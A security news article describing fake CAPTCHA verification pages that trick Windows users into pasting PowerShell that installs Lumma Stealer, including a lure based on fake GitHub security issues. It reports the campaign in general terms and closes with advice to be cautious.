Fake human verification pages continue to pose a significant threat to Windows users, with security researchers uncovering a new campaign that highlights the dangers of falling victim to these malicious pages. Palo Alto Networks’ Unit 42 recently identified seven CAPTCHA-style human verification pages that were designed to deceive unsuspecting users.
According to Unit 42’s threat hunter Paul Michaud II, these pages prompt users to paste PowerShell script into a Run window under the guise of completing a human verification process. However, the copied script actually downloads and executes the Lumma Stealer malware onto the victim’s system. This deceptive tactic aims to trick users into unknowingly installing harmful software that can compromise their sensitive information and security.
In a more recent development, CloudSEC researchers have discovered additional active fake human verification pages hosted on various providers and utilizing content delivery networks to distribute the Lumma Stealer malware. By clicking on the “I’m not a robot” button on these pages, users unknowingly copy the malicious PowerShell script to their clipboard. When pasted into the Run dialog box, the script executes hidden PowerShell commands that ultimately lead to the installation of the Lumma Stealer malware.
The malware’s capabilities include establishing connections with attacker-controlled domains, posing a severe threat to the infected system’s security. Additionally, the researchers noted that the malware delivered through these fake human verification pages can be easily modified, allowing threat actors to adapt their tactics and evade detection.
One of the key questions that arises from these findings is how targeted users are directed to these malicious pages in the first place. Security researcher Ax Sharma uncovered a sophisticated tactic where malware peddlers exploit legitimate GitHub servers to lure users into visiting fake human verification pages. By creating fake “issues” on open source repositories on GitHub and claiming the presence of security vulnerabilities, the perpetrators trigger email alerts to contributors and subscribers of these repositories.
These email alerts, seemingly originating from the GitHub Security Team, direct recipients to the malicious domain github-scanner[.]com, where a fake human verification page is waiting to deliver a trojan to unsuspecting victims. This manipulation of legitimate platforms like GitHub demonstrates the evolving strategies employed by cybercriminals to trick users into downloading malware unknowingly.
As the prevalence of fake human verification pages continues to grow, users need to remain vigilant and exercise caution when interacting with online content. It is essential to stay informed about the latest cybersecurity threats and be wary of unexpected emails or alerts that prompt actions such as running PowerShell scripts. By maintaining a proactive approach to cybersecurity and adopting best practices for online safety, users can better protect themselves against the evolving tactics of malicious actors.